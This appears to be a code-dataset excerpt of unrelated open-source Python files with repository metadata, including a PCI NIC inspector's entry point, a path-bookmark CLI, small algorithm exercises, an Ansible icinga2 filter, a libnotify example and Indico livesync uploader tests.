        if tgdir != cwd:
            logger.warn("resetting cwd (was %s, now %s)", cwd, tgdir)
            os.chdir(tgdir)
from device import Device
# Platform-specific bus interfaces; imported after the chdir above.
if sys_name == "Linux":
    from interfaces.sysfs import SysfsInterface
    from interfaces.vfio import VfioInterface
    from interfaces.uio import UioInterface
elif sys_name == "Windows" or sys_name == "cli":
    from interfaces.win import WinInterface
else:
    raise NotImplementedError("this version of thundergate only runs on linux and windows")
import reutils
import argparse
def banner():
    # Print the startup ASCII-art banner (Python 2 print statement).
    print """
 ####### #####
 # # # # # # # ##### ###### ##### # # ## ##### ######
 # # # # # ## # # # # # # # # # # #
 # ###### # # # # # # # ##### # # # #### # # # #####
 # # # # # # # # # # # ##### # # ###### # #
 # # # # # # ## # # # # # # # # # # #
 # # # #### # # ##### ###### # # ##### # # # ######
 Version 0.9.9
 Copyright (c) 2015-2016 Saul St John
 http://thundergate.io
 """
def main(args):
    """Parse CLI arguments, locate/open the tg3 device and dispatch to the
    selected front-end (shell, gui, tap driver, tests, installer or CDP
    server).  Returns a process exit code."""
    parser = argparse.ArgumentParser()
    if sys_name == "Linux":
        parser.add_argument("--device", help="BDF of tg3 PCI device", default=None)
        parser.add_argument("--devid", help="id of tg3 PCI device", default=None)
    parser.add_argument("-p", "--ptvsd", help="enable ptvsd server", action="store_true")
    parser.add_argument("--ptvsdpass", help="ptvsd server password", default=None)
    parser.add_argument("-t", "--tests", help="run tests", action="store_true")
    parser.add_argument("-s", "--shell", help="ipython cli", action="store_true")
    parser.add_argument("-b", "--backup", help="create eeprom backup", action="store_true", default=False)
    parser.add_argument("-d", "--driver", help="load userspace tap driver", action="store_true")
    parser.add_argument("-i", "--install", help="install thundergate firmware", action="store_true")
    parser.add_argument("--wait", help="wait for debugger attachment at startup", action="store_true")
    parser.add_argument("--cdpserver", help="launch VS Code debug protocol server", action="store_true")
    parser.add_argument("-g", "--gui", help="launch wxpython gui", action="store_true")
    args = parser.parse_args(args=args[1:])
    if args.cdpserver:
        # CDP speaks over stdio: keep the real console handles and
        # redirect this process's stdio away from it.
        conout = sys.stdout
        conin = sys.stdin
        sys.stdin = open(os.devnull, "r")
        sys.stdout = open("cdp.%d.log" % os.getpid(), "w")
    banner()
    ima = "inspector"
    try:
        if args.driver: ima = "userspace driver"
    except:
        pass
    logger.info("tg3 %s initializing" % ima)
    logger.debug("process id is %d" % os.getpid())
    if args.ptvsd:
        import ptvsd
        ptvsd.enable_attach(secret=args.ptvsdpass)
        if args.wait:
            logger.info("waiting for ptvsd client...")
            ptvsd.wait_for_attach()
            logger.info("ptvsd client attached!")
            ptvsd.break_into_debugger()
        else:
            logger.info("ptvsd server enabled")
    elif args.wait:
        print "[!] press 'enter' to continue..."
        raw_input()
    if sys_name == 'Linux':
        # Resolve the device's PCI domain:bus:device.function, either from
        # --device or by scanning lspci for the (default tg3) vendor:device id.
        if args.device is None:
            devid = args.devid
            if devid is None:
                devid = "14e4:1682"
            dbdf = subprocess.check_output(["lspci", "-d %s" % devid, "-n"]).split(" ")[0].strip()
            if '' == dbdf:
                logger.error("tigon3 device not found")
                return 1
        else:
            dbdf = args.device
            if len(dbdf.split(':')) == 2:
                dbdf = "0000:%s" % dbdf
        if not os.path.exists("/sys/bus/pci/devices/%s/" % dbdf):
            logger.error(
                "device resources at /sys/bus/pci/devices/%s/ not found; " +
                "is sysfs mounted?", dbdf)
            return 1
        # Pick the access interface matching the currently bound kernel module.
        try:
            kmod = os.readlink("/sys/bus/pci/devices/%s/driver" % dbdf).split('/')[-1]
        except:
            kmod = ''
        if kmod == 'vfio-pci':
            dev_interface = VfioInterface(dbdf)
        elif kmod == 'uio_pci_generic':
            dev_interface = UioInterface(dbdf)
        else:
            dev_interface = SysfsInterface(dbdf)
        if kmod == 'tg3' and args.driver:
            logger.error("device is currently bound to tg3; this won't work")
            return 1
    elif sys_name == 'Windows' or sys_name == 'cli':
        try:
            dev_interface = WinInterface()
        except:
            dev_interface = None
    if not args.backup:
        # Offer to make an eeprom backup before touching the hardware.
        if not os.path.exists("eeprom.bak"):
            logger.warn("no backup image found")
            if not args.cdpserver:
                resp = raw_input("\n\n" +
                        "would you like to create a backup image (y/n): ")
                if resp[0] in "yY":
                    args.backup = True
    with Device(dev_interface) as dev:
        if args.backup:
            dev.nvram.init()
            dev.nvram.dump_eeprom("eeprom.bak")
            logger.info("eeprom backup saved as 'eeprom.bak'")
        if args.install:
            from tginstall import TgInstaller
            with TgInstaller(dev) as i:
                return i.run()
        elif args.shell:
            from shelldrv import ShellDriver
            with ShellDriver(dev) as shell:
                if args.tests:
                    from testdrv import TestDriver
                    with TestDriver(dev) as test:
                        test.run()
                    return shell.run(loc=locals())
                else:
                    return shell.run(loc=locals())
        elif args.cdpserver:
            from cdpserver import CDPServer
            with CDPServer(dev, conin, conout) as server:
                return server.run()
        elif args.gui:
            import gui
            dev.reset(cold = True)
            gui._run(dev)
        else:
            if args.driver:
                import tap
                return tap.run(dev)
            elif args.tests:
                from testdrv import TestDriver
                with TestDriver(dev) as test:
                    return test.run()
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit code.
    sys.exit(main(sys.argv))
|
sstjohn/thundergate
|
py/main.py
|
Python
|
gpl-3.0
| 7,973
|
#!/usr/bin/env python
# Small program for storing and retrieving paths from a database
# Copyright (C) 2014 Gustav Behm
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os.path import expanduser, isfile
from os import getcwd
import anydbm
from optionparser import OptionParser, Command, Configuration
import sys
import tabularize
# Global configuration parameters
name = "qcd"
default_db_file = "~/." + name + "db"
# Wrappers for managing the database
def initialize_database (writeable = False):
    """Open the anydbm database named by the -f/--file option.

    Read-only mode exits with status 1 when the file does not exist yet;
    writeable mode creates it on demand ('c' flag).
    """
    # NOTE: `file` shadows the Python 2 builtin of the same name.
    file = expanduser (file_option.value)
    if not writeable and not isfile(file):
        print >> sys.stderr, "Database is empty! Try adding something!"
        sys.exit (1)
    if writeable:
        return anydbm.open (file, 'c')
    else:
        return anydbm.open (file, 'r')
def close_database (db):
    """Flush and close an anydbm handle opened by initialize_database."""
    db.close ()
# Helpers
def getAnonymousKey (db):
    """Return the smallest positive integer, as a string, that is not
    already used as a key in *db*."""
    candidate = 1
    while str(candidate) in db:
        candidate += 1
    return str(candidate)
def syntaxError (info = ""):
    """Report a command-line syntax error, print usage and exit(2)."""
    print >> sys.stderr, "Syntax error!" + info
    parser.usage ()
    sys.exit (2)
# Implementation of the commands
def add (args):
    """Store a path: `add LABEL PATH` or `add PATH` (auto-numbered key)."""
    if len (args) == 0 or len (args) > 2:
        syntaxError ()
    db = initialize_database (True)
    if len (args) == 2:
        key = args[0]
        db[key] = args[1]
    else:
        # No label given: use the next free numeric key.
        key = getAnonymousKey (db)
        db[key] = args[0]
    close_database (db)
def save (args):
    """Store the current working directory, optionally under LABEL."""
    if len (args) > 1:
        syntaxError ()
    # Delegate to add() with cwd appended as the path argument.
    args.append ( getcwd() )
    add (args)
def change (args):
    """Replace the path stored under an existing label: `change LABEL NEW_PATH`."""
    if len (args) != 2:
        syntaxError ()
    db = initialize_database (True)
    if not args[0] in db:
        print >> sys.stderr, args[0] + " does not exist in the database."
        close_database (db)
        sys.exit (1)
    db[args[0]] = args[1]
    close_database (db)
def move(args):
    """Rename an entry: `move FROM TO`.  Fails if FROM is missing or TO
    already exists."""
    if len (args) != 2:
        syntaxError ()
    db = initialize_database (True)
    if not args[0] in db:
        print >> sys.stderr, args[0] + " does not exist in the database."
        close_database (db)
        sys.exit (1)
    if args[1] in db:
        print >> sys.stderr, args[1] + " already exist in the database."
        close_database (db)
        sys.exit (1)
    db[args[1]] = db[args[0]]
    del db[args[0]]
    close_database (db)
def delete (args):
    """Remove an entry: `delete LABEL`."""
    if len (args) != 1:
        syntaxError ()
    db = initialize_database (True)
    try:
        del db[args[0]]
    except:
        print >> sys.stderr, args[0] + " does not exist in the database."
        close_database (db)
        sys.exit (1)
    close_database (db)
def list (args):
    """Print all entries as a table (to stderr, so `get` piping stays clean).

    NOTE: shadows the builtin `list`; kept because the name is registered
    as the 'list' command below.
    """
    if len (args) != 0:
        syntaxError ()
    db = initialize_database ()
    tabularize.write (sorted (db.iteritems()), writeable = sys.stderr)
    close_database (db)
def get (args):
    """Print the path stored under LABEL to stdout: `get LABEL`."""
    if len (args) != 1:
        syntaxError ()
    db = initialize_database ()
    try:
        print db[args[0]]
    except:
        print >> sys.stderr, args[0] + " does not exist in the database."
        close_database (db)
        sys.exit (1)
    close_database (db)
# The command line parser
# Wire up the CLI: one OptionParser with the database-file option and one
# Command per operation defined above, then parse argv.
parser = OptionParser (name)
# The options
file_option = Configuration ("f", "file", "Specifies which database to use",
        default_db_file, syntax = "FILENAME")
parser.add (file_option)
# The commands
help_command = Command ("h", "help", "Prints this helpful message",
        lambda args:parser.usage ())
parser.add (help_command)
add_command = Command ("a", "add", "Add a new entry into the database", add,
        syntax = "[LABEL] PATH")
parser.add (add_command)
save_command = Command ("s", "save", "Add current path into the database",
        save, syntax = "[LABEL]")
parser.add (save_command)
move_command = Command ("m", "move", "Rename an entry in the database", move,
        syntax = "FROM TO")
parser.add (move_command)
change_command = Command ("c", "change",
        "Changes the path of an entry in the database", change,
        syntax = "LABEL NEW_PATH")
parser.add (change_command)
delete_command = Command ("d", "delete", "Delete an entry from the database",
        delete, syntax = "LABEL")
parser.add (delete_command)
list_command = Command ("l", "list", "List the entries in the database", list)
parser.add (list_command)
retrieve_command = Command ("g", "get", "Retrieve an entry from the database",
        get, True, syntax = "LABEL")
parser.add (retrieve_command)
# Parse it!
parser.parse ()
|
rootmos/qcd
|
qcd.py
|
Python
|
gpl-3.0
| 5,030
|
def my_power_func(n, a):
    """Compute n**a for a non-negative integer exponent a.

    Exponentiation by squaring: O(log a) multiplications.
    """
    if a == 0:
        return 1
    if a % 2 == 0:
        # Compute the half power only on the even path; the original
        # computed it unconditionally and discarded it when a was odd,
        # doing redundant recursive work.  `a // 2` makes the integer
        # division explicit (the original relied on Python 2's `/`).
        half = my_power_func(n, a // 2)
        return half * half
    return n * my_power_func(n, a - 1)
print my_power_func(3, 6)
|
purushothamc/myibitsolutions
|
mathematics/power_function.py
|
Python
|
gpl-3.0
| 194
|
#
# Copyright 2017 Russell Smiley
#
# This file is part of timetools.
#
# timetools is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# timetools is distributed in the hope that it will be useful
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with timetools. If not, see <http://www.gnu.org/licenses/>.
#
import timetools.synchronization.compliance.analysis as tsca
# Rec. ITU-T G.8262/Y.1362 (2010)/Amd.2 (10/2012), Appendix V, Table V.1, pp 2
# TDEV compliance mask in nanoseconds over observation-interval ranges (s):
# constant 10.2 ns up to 1.73 s, linear 5.88*t beyond, then 32.26*t^0.5.
tdevNs = tsca.Mask([ ([0.1, 1.73], [10.2]),
                     ([1.73, 30], [0, 5.88]),
                     ([30, 1000], ([32.26], [0.5]))])
|
blueskyjunkie/timeTools
|
timetools/synchronization/compliance/ituTG8262/eecOption2/noiseTransfer.py
|
Python
|
gpl-3.0
| 986
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
class SurveyStage(models.Model):
    """Kanban stage (column) that surveys move through."""
    _name = 'survey.stage'
    _description = 'Survey Stage'
    _order = 'sequence,id'
    name = fields.Char(required=True, translate=True)
    # Position of the stage among its siblings.
    sequence = fields.Integer(default=1)
    closed = fields.Boolean(help="If closed, people won't be able to answer to surveys in this column.")
    fold = fields.Boolean(string="Folded in kanban view")
    _sql_constraints = [
        # Enforced in the database: sequence must be >= 0.
        ('positive_sequence', 'CHECK(sequence >= 0)', 'Sequence number MUST be a natural')
    ]
|
t3dev/odoo
|
addons/survey/models/survey_stage.py
|
Python
|
gpl-3.0
| 637
|
"""
WSGI config for circuitSimSite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Default settings module; deployments may override it via the environment.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "circuitSimSite.settings")
application = get_wsgi_application()
|
daniloefl/circuitSim
|
web/circuitSimSite/circuitSimSite/wsgi.py
|
Python
|
gpl-3.0
| 405
|
import functools
from numpy import *
# Shadow numpy's constructors (star-imported above) with float-dtype
# defaults so integer inputs yield float arrays in this dialect.
arange = functools.partial(arange, dtype="float")
array = functools.partial(array, dtype="float")
|
pavpanchekha/oranj
|
oranj/pystdlib/numpy_or.py
|
Python
|
gpl-3.0
| 136
|
from urbansearch.clustering import text_preprocessor
# Shared preprocessor instance used by every test below.
p = text_preprocessor.PreProcessor()
def test_strip_words():
    """Stop words ('de', 'van') are removed; content words are kept."""
    text = ['de', 'buik', 'van', 'Marko']
    expected = ['buik', 'Marko']
    assert expected == p.strip_words(text)
def test_strip_words_size():
    """Tokens that are too short or too long are dropped."""
    text = ['aa', 'bbb', 'cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc']
    expected = ['bbb']
    assert p.strip_words(text) == expected
def test_clean_text():
    """Punctuation and digits are stripped from the raw text."""
    text = 'a, . cd ; f 23213'
    expected = 'a cd f '
    result = p.clean_text(text)
    assert result == expected
def test_tokenize():
    """Whitespace-separated words become individual tokens."""
    text = 'een twee drie'
    expected = ['een', 'twee', 'drie']
    assert expected == p.tokenize(text)
def test_full_preprocessing():
    """pre_process keeps word order and casing, dropping punctuation only."""
    text = 'Een is oke. Dit niet: twee, drie.'
    expected = 'Een is oke Dit niet twee drie'
    assert expected == p.pre_process(text)
def test_full_preprocessing_to_array():
    """pre_process_to_array additionally strips stop/short words."""
    text = 'Een is oke. Dit niet: twee, drie.'
    expected = ['oke', 'twee', 'drie']
    assert expected == p.pre_process_to_array(text)
|
urbansearchTUD/UrbanSearch
|
tests/clustering/test_text_preprocessor.py
|
Python
|
gpl-3.0
| 1,044
|
class Solution:
    # backtracking/recursion (a bit-mask enumeration over range(2**n)
    # would also work, at the cost of a different output order)
    def subsets(self, nums):
        """Return every subset of *nums*.

        Output is grouped by subset size: the empty set first, then all
        1-element subsets, then all 2-element subsets, and so on; within
        each size group, subsets appear in input-index order.

        :type nums: List[int]
        :rtype: List[List[int]]
        """
        result = [[]]

        def extend(prefix, start, remaining):
            # Grow *prefix* with elements at indices >= start until it
            # reaches the requested size, then record it.
            if remaining == 0:
                result.append(prefix)
                return
            for idx in range(start, len(nums)):
                extend(prefix + [nums[idx]], idx + 1, remaining - 1)

        for size in range(1, len(nums) + 1):
            extend([], 0, size)
        return result
|
YiqunPeng/Leetcode-pyq
|
solutions/78Subsets.py
|
Python
|
gpl-3.0
| 1,090
|
def to_icinga2_expression(a):
    """Render dict *a* as newline-separated icinga2 ``vars.*`` assignments."""
    lines = []
    for key, value in a.items():
        lines.append(var2string(key, value))
    return "\n".join(lines)
def var2string(key, value):
    """Format one icinga2 custom-variable entry.

    Scalars become ``vars.<key> = <value>`` lines (strings quoted, ints
    bare), lists become ``vars.<key> = [ "a", "b" ]`` and dicts expand to
    one ``vars.<key>["<entry>"] = { ... }`` section per item.

    Note: checks deliberately use ``type(value) is ...`` so subclasses
    such as ``bool`` (a subclass of ``int``) are rejected with TypeError.
    """
    value_type = type(value)
    if value_type is str:
        return 'vars.%s = "%s"' % (key, value)
    if value_type is int:
        return 'vars.%s = %d' % (key, value)
    if value_type is list:
        quoted = '", "'.join(value)
        return 'vars.%s = [ "%s" ]' % (key, quoted)
    if value_type is dict:
        sections = []
        for entry, values in value.items():
            sections.append(
                'vars.%s["%s"] = {\n%s\n}' % (key, entry, var_keys2string(values)))
        return "\n".join(sections)
    raise TypeError("unknown type %s, expecting type dict, list, str or int" % value_type)
def var_keys2string(values):
    """
    generates the values part of vars.xyz["myKey"] = *{ values }*
    (one indented ``key = value`` line per dict item)
    :param values: dict of entry attributes
    :return: newline-joined, indented lines
    """
    return "\n".join([" " + value2string(k, v) for k, v in values.items()])
def value2string(key, value):
    """Format a single ``key = value`` line inside a vars section body.

    ints are emitted bare, lists as ``[ "a", "b" ]`` (each element
    stringified and double-quoted), everything else double-quoted.
    """
    if type(value) is int:
        return '%s = %s' % (key, value)
    elif type(value) is list:
        # Removed a stray debug print() that dumped the quoted elements
        # to stdout on every list-valued call.
        return "%s = [ %s ]" % (key, ", ".join(['"%s"' % str(i) for i in value]))
    else:
        return '%s = "%s"' % (key, value)
class FilterModule(object):
    """Ansible filter plugin entry point."""

    @staticmethod
    def filters():
        # Map the filter name used in playbooks to its implementation.
        return dict(to_icinga2=to_icinga2_expression)
|
zauberpony/ansible-to-icinga2
|
filter_plugins/to_icinga2.py
|
Python
|
gpl-3.0
| 1,574
|
#!/usr/bin/python
"""
CONFIG CONVERTER
this script converts your custom tag string section from the v.3.1 syntax
to the current format.
>>> tagsections_convert.py -o config.new config.old
will convert your whole alot config safely to the new format.
"""
from configobj import ConfigObj
import argparse
import sys
import re
def get_leaf_value(cfg, path, fallback=''):
    """Walk ``path`` through nested config sections and return the leaf.

    Returns ``fallback`` when the final key is absent, but None when an
    intermediate section is missing (asymmetry preserved from the
    original behaviour).
    """
    if len(path) > 1:
        # Descend one level; a missing intermediate section yields None.
        head, tail = path[0], path[1:]
        if head not in cfg:
            return None
        return get_leaf_value(cfg[head], tail, fallback)
    # Leaf lookup: ConfigObj roots only count real scalar entries.
    key = path[0]
    if isinstance(cfg, ConfigObj):
        if key not in cfg.scalars:
            return fallback
        return cfg[key]
    if key not in cfg:
        return fallback
    return cfg[key]
if __name__ == "__main__":
    # Command line: a config file to convert plus an optional output
    # destination (defaults to stdout).
    parser = argparse.ArgumentParser(description='update alot theme files')
    parser.add_argument('configfile', type=argparse.FileType('r'),
                        help='theme file to convert')
    parser.add_argument('-o', type=argparse.FileType('w'), dest='out',
                        help='destination', default=sys.stdout)
    args = parser.parse_args()
    cfg = ConfigObj(args.configfile)
    out = args.out
    # NOTE(review): looks like leftover debug output -- confirm
    print args
    def is_256(att):
        # True when `att` is a 256-colour spec: "gN"/"gNN"/"gNNN"
        # greyscale (no fourth digit) or a 3-digit hex colour like "#fff".
        r = r'(g\d{1,3}(?!\d))|(#[0-9A-Fa-f]{3}(?![0-9A-Fa-f]))'
        return re.search(r, att)
    if 'tags' in cfg:
        # Rewrite every [tags] subsection from the old fg=/bg= syntax to a
        # 6-element attribute list stored under 'normal'.
        for tag in cfg['tags'].sections:
            sec = cfg['tags'][tag]
            att = [''] * 6
            if 'fg' in sec:
                fg = sec['fg']
                # Slot 2 presumably holds the 16-colour fg and slot 4 the
                # 256-colour fg -- TODO confirm against alot's theme spec.
                if not is_256(fg):
                    att[2] = fg
                att[4] = fg
                del sec['fg']
            if 'bg' in sec:
                bg = sec['bg']
                # Same layout for backgrounds: slots 3 (16c) and 5 (256c).
                if not is_256(bg):
                    att[3] = bg
                att[5] = bg
                del sec['bg']
            sec['normal'] = att
            # The old 'hidden' flag becomes an empty 'translated' string.
            if sec.get('hidden'):
                sec['translated'] = ''
    cfg.write(out)
|
dcbaker/alot
|
extra/tagsections_convert.py
|
Python
|
gpl-3.0
| 2,099
|
from .base import main
|
ForgemAR/rocket-tip-creation
|
conegen/__init__.py
|
Python
|
gpl-3.0
| 23
|
#!/usr/bin/python
################################################################################
##3456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789
## 10 20 30 40 50 60 70 80
##
## Info:
## Example of how to use libnotify correctly and at the same time comply to
## the new jaunty notification spec (read: visual guidelines)
##
## Run:
## chmod +x append-hint-example.py
## ./append-hint-example.py
##
## Copyright 2009 Canonical Ltd.
##
## Author:
## Mirco "MacSlow" Mueller <mirco.mueller@canonical.com>
##
## This program is free software: you can redistribute it and/or modify it
## under the terms of the GNU General Public License version 3, as published
## by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranties of
## MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
## PURPOSE. See the GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program. If not, see <http://www.gnu.org/licenses/>.
##
################################################################################
import sys
import time
import pynotify
# even in Python this is globally nasty :), do something nicer in your own code
# Every capability/hint the notification daemon might advertise, initially
# all False; initCaps() flips to True the ones the running daemon reports.
capabilities = {'actions': False,
 'body': False,
 'body-hyperlinks': False,
 'body-images': False,
 'body-markup': False,
 'icon-multi': False,
 'icon-static': False,
 'sound': False,
 'image/svg+xml': False,
 'x-canonical-private-synchronous': False,
 'x-canonical-append': False,
 'x-canonical-private-icon-only': False,
 'x-canonical-truncation': False}
def initCaps ():
caps = pynotify.get_server_caps ()
if caps is None:
print "Failed to receive server caps."
sys.exit (1)
for cap in caps:
capabilities[cap] = True
def printCaps ():
info = pynotify.get_server_info ()
print "Name: " + info["name"]
print "Vendor: " + info["vendor"]
print "Version: " + info["version"]
print "Spec. Version: " + info["spec-version"]
caps = pynotify.get_server_caps ()
if caps is None:
print "Failed to receive server caps."
sys.exit (1)
print "Supported capabilities/hints:"
if capabilities['actions']:
print "\tactions"
if capabilities['body']:
print "\tbody"
if capabilities['body-hyperlinks']:
print "\tbody-hyperlinks"
if capabilities['body-images']:
print "\tbody-images"
if capabilities['body-markup']:
print "\tbody-markup"
if capabilities['icon-multi']:
print "\ticon-multi"
if capabilities['icon-static']:
print "\ticon-static"
if capabilities['sound']:
print "\tsound"
if capabilities['image/svg+xml']:
print "\timage/svg+xml"
if capabilities['x-canonical-private-synchronous']:
print "\tx-canonical-private-synchronous"
if capabilities['x-canonical-append']:
print "\tx-canonical-append"
if capabilities['x-canonical-private-icon-only']:
print "\tx-canonical-private-icon-only"
if capabilities['x-canonical-truncation']:
print "\tx-canonical-truncation"
print "Notes:"
if info["name"] == "notify-osd":
print "\tx- and y-coordinates hints are ignored"
print "\texpire-timeout is ignored"
print "\tbody-markup is accepted but filtered"
else:
print "\tnone"
def pushNotification (title, body, icon):
    # Show one notification flagged for append-mode merging, then pause
    # briefly so successive calls look like a user typing messages.
    notification = pynotify.Notification (title, body, icon)
    notification.set_hint_string ("x-canonical-append", "true")
    notification.show ()
    time.sleep (3)
if __name__ == '__main__':
if not pynotify.init ("append-hint-example"):
sys.exit (1)
# call this so we can savely use capabilities dictionary later
initCaps ()
# show what's supported
printCaps ()
# try the append-hint
if capabilities['x-canonical-append']:
pushNotification ("Cole Raby",
"Hey Bro Coly!",
"notification-message-im");
pushNotification ("Cole Raby",
"What's up dude?",
"notification-message-im");
pushNotification ("Cole Raby",
"Did you watch the air-race in Oshkosh last week?",
"notification-message-im");
pushNotification ("Cole Raby",
"Phil owned the place like no one before him!",
"notification-message-im");
pushNotification ("Cole Raby",
"Did really everything in the race work according to regulations?",
"notification-message-im");
pushNotification ("Cole Raby",
"Somehow I think to remember Burt Williams did cut corners and was not punished for this.",
"notification-message-im");
pushNotification ("Cole Raby",
"Hopefully the referees will watch the videos of the race.",
"notification-message-im");
pushNotification ("Cole Raby",
"Burt could get fined with US$ 50000 for that rule-violation :)",
"notification-message-im");
else:
print "The daemon does not support the x-canonical-append hint!"
|
dkasak/notify-osd-customizable
|
examples/append-hint-example.py
|
Python
|
gpl-3.0
| 5,175
|
####################################################################################################
#
# Patro - A Python library to make patterns for fashion design
# Copyright (C) 2019 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
####################################################################################################
|
FabriceSalvaire/PyValentina
|
tools/license-template.py
|
Python
|
gpl-3.0
| 965
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
#
# DAI - Desarrollo de Aplicaciones para Internet
#
# 2014 Ernesto Serrano <erseco@correo.ugr.es>
#
#-----------------------------------------------
Cree un programa que lea de un fichero de texto un numero entero n y escriba en otro fichero de
texto el n-esimo numero de la sucesion de Fibonacci (http://es.wikipedia.org/wiki/Sucesi\%C3\%B3n_de_Fibonacci).
'''
# Funcion para calcular el enésimo digito de la sucesión de fibonacci
def fibonacci(n):
    """Return the n-th Fibonacci number (F(0)=0, F(1)=1).

    Iterative implementation: the previous naive double recursion
    recomputed subproblems exponentially; this runs in O(n) time and
    O(1) space while producing the same values.
    """
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a
# Read the input file; it is expected to hold a single integer n.
# (`with` fixes the original leak: the input handle was never closed.)
with open("fichero.txt", "rt") as file_in:
    n = file_in.read()
# Only proceed when the contents are a non-negative integer; otherwise
# no output file is produced (matching the original behaviour).
if n.isdigit():
    n = int(n)
    # Write the n-th Fibonacci number; the context manager guarantees
    # the output file is closed even if writing fails.
    with open("salida.txt", "wt") as file_out:
        file_out.write(str(fibonacci(n)))
|
erseco/ugr_desarrollo_aplicaciones_internet
|
Practica_01/ejercicio_04.py
|
Python
|
gpl-3.0
| 997
|
# This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from mock import MagicMock, Mock
from indico_livesync import SimpleChange
from indico_livesync.models.queue import LiveSyncQueueEntry, ChangeType, EntryType
from indico_livesync.uploader import Uploader, MARCXMLUploader
from MaKaC.conference import Conference
class RecordingUploader(Uploader):
    """An uploader that records every batch it is asked to upload."""

    def __init__(self, *args, **kwargs):
        super(RecordingUploader, self).__init__(*args, **kwargs)
        self._uploaded = []
        self.logger = MagicMock()

    def upload_records(self, records, from_queue):
        # Queue runs hand us a mapping (snapshot its items); initial runs
        # hand us a plain collection of records.
        if from_queue:
            payload = set(records.viewitems())
        else:
            payload = set(records)
        self._uploaded.append((payload, from_queue))

    @property
    def all_uploaded(self):
        return self._uploaded
class FailingUploader(RecordingUploader):
    """A recording uploader whose second batch blows up."""

    def __init__(self, *args, **kwargs):
        super(FailingUploader, self).__init__(*args, **kwargs)
        self._batch_count = 0

    def upload_records(self, records, from_queue):
        super(FailingUploader, self).upload_records(records, from_queue)
        self._batch_count += 1
        # Fail on the second batch to exercise the error path.
        if self._batch_count == 2:
            raise Exception('All your data are belong to us!')
def test_run_initial(mocker):
    """An initial export uploads in batches and marks nothing processed."""
    mocker.patch.object(Uploader, 'processed_records', autospec=True)
    uploader = RecordingUploader(MagicMock())
    uploader.INITIAL_BATCH_SIZE = 3
    records = tuple(Mock(spec=Conference, id=evt_id) for evt_id in xrange(4))
    uploader.run_initial(records)
    # Two batches expected: a full one of 3 and a short tail of 1
    # (no None padding, just the events).
    first_batch, second_batch = set(records[:3]), set(records[3:])
    assert uploader.all_uploaded == [(first_batch, False), (second_batch, False)]
    # An initial export has no queue entries to flag as processed.
    assert not uploader.processed_records.called
def test_run(mocker, db, create_event, dummy_agent):
    """Queued entries are uploaded in batches and flagged processed."""
    uploader = RecordingUploader(MagicMock())
    uploader.BATCH_SIZE = 3
    events = tuple(create_event(id_=evt_id) for evt_id in xrange(4))
    records = tuple(LiveSyncQueueEntry(change=ChangeType.created, type=EntryType.event, event_id=evt.id,
                                       agent=dummy_agent)
                    for evt in events)
    for entry in records:
        db.session.add(entry)
    db.session.flush()
    db_mock = mocker.patch('indico_livesync.uploader.db')
    uploader.run(records)
    expected = tuple((entry.object, int(SimpleChange.created)) for entry in records)
    assert uploader.all_uploaded == [(set(expected[:3]), True), (set(expected[3:]), True)]
    # Every queue entry must end up flagged as processed...
    assert all(entry.processed for entry in records)
    # ...and each processed batch commits immediately (one commit per batch).
    assert db_mock.session.commit.call_count == 2
def test_run_failing(mocker, db, create_event, dummy_agent):
    """A failing batch stops the run; earlier batches stay committed."""
    uploader = FailingUploader(MagicMock())
    uploader.BATCH_SIZE = 3
    events = tuple(create_event(id_=evt_id) for evt_id in xrange(10))
    records = tuple(LiveSyncQueueEntry(change=ChangeType.created, type=EntryType.event, event_id=evt.id,
                                       agent=dummy_agent)
                    for evt in events)
    for entry in records:
        db.session.add(entry)
    db.session.flush()
    db_mock = mocker.patch('indico_livesync.uploader.db')
    uploader.run(records)
    expected = tuple((entry.object, int(SimpleChange.created)) for entry in records)
    assert uploader.logger.exception.called
    # The second batch raises, so no further batches are attempted.
    assert uploader._uploaded == [(set(expected[:3]), True), (set(expected[3:6]), True)]
    # Entries from the successful first batch are marked processed...
    assert all(entry.processed for entry in records[:3])
    assert not any(entry.processed for entry in records[3:])
    # ...and only that successful batch triggered a commit.
